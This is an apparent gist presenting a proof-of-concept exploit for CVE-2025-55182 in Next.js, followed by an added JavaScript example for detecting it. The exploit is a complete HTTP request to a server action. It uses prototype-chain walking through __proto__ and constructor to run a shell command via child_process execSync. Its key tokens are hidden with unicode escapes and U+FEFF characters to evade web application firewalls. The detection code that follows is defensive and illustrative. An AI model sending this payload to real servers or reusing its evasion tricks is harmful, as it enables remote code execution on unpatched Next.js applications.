@D0n9
Created December 8, 2025 10:48
CVE-2025-55182 Next.js WAF Bypass PoC
POST / HTTP/1.1
Host: localhost
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate
Accept: */*
Next-Action: x
Content-Length: 1452
Content-Type: multipart/form-data; boundary=48864b92f2a7dd41cc10c2cbe428f6f3
Connection: keep-alive
--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=0
{
"then": "\u00240:x0",
"x0": "\u00241\\:\u005f\u005fproto\u005f\u005f:then",
"a": {
"b": {
"c": "resolved\u005fmodel"
}
},
"status": "\u00240\\:a:b:c",
"reason": 1337,
"value": "$5:arr:1",
"_response": "$5\u005c\u005c\u003a\u0078\u0031"
}
--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=1
"$@0"
--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=2
"\u00241\uFEFF\\:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"
--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=3
"\u00242\uFEFF\\:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"
--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=4
"\u00243"
--48864b92f2a7dd41cc10c2cbe428f6f3
Content-Disposition: form-data; name=5
{
"arr": [
"x",
"{\"then\": \"$B0\"}",
"xxx"
],
"x1": {
"_pref\u0069x": "var\uFEFFres=process\uFEFF.mainModule.cons\u0074ructor\uFEFF.\uFEFF_load\uFEFF('\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073').execSync\uFEFF\uFEFF('ls');throw Object.assign(\u006e\u0065\u0077 Error('NEXT_REDIRECT'), {\uFEFFdigest:\u0060${res}\u0060});",
"_formData": {
"get": "\u00244"
}
}
}
--48864b92f2a7dd41cc10c2cbe428f6f3--
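
An added detection example (not part of the gist and not any WAF product's code): the request above writes its sensitive tokens as JSON `\uXXXX` escapes and pads them with U+FEFF, so a signature has to run on the decoded, stripped strings rather than on the raw bytes. The rule names, the `inspectFields` helper and the sample fields are constructed for illustration.

```javascript
// Added example: match on decoded, de-obfuscated strings, not on raw bytes.
// Rule names and patterns are illustrative; the tokens come from the request above.
const RULES = [
  ['prototype-walk', /\$[^"]*:(__proto__|constructor|prototype)\b/],
  ['node-code-exec', /child_process|process\.mainModule|execSync/],
];
// U+FEFF and the zero-width characters: invisible padding that splits a token.
const INVISIBLE = /[\uFEFF\u200B-\u200D\u2060]/g;

// Yield every key and string value in a parsed JSON document.
function* strings(node) {
  if (typeof node === 'string') yield node;
  else if (node && typeof node === 'object') {
    for (const [key, value] of Object.entries(node)) {
      yield key;
      yield* strings(value);
    }
  }
}

// fields: { partName: rawBodyText } as extracted from the multipart request.
function inspectFields(fields) {
  const findings = [];
  for (const [field, raw] of Object.entries(fields)) {
    let doc;
    try { doc = JSON.parse(raw); } // decodes every \uXXXX escape
    catch { doc = raw; }           // not JSON: inspect the text itself
    for (const s of strings(doc)) {
      const clean = s.replace(INVISIBLE, '');
      for (const [rule, re] of RULES) {
        if (re.test(clean)) {
          // hiddenFromRaw: the same pattern finds nothing in the bytes on the wire
          findings.push({ field, rule, hiddenFromRaw: !re.test(raw) });
        }
      }
    }
  }
  return findings;
}

// Constructed sample fields: fragments in the style of the request, plus one benign field.
const SAMPLE = {
  0: String.raw`{"x0":"\u00241\\:\u005f\u005fproto\u005f\u005f:then"}`,
  1: String.raw`{"_pref\u0069x":"process\uFEFF.mainModule"}`,
  2: '{"note":"constructor of the building: $5"}',
};
console.log(inspectFields(SAMPLE));
```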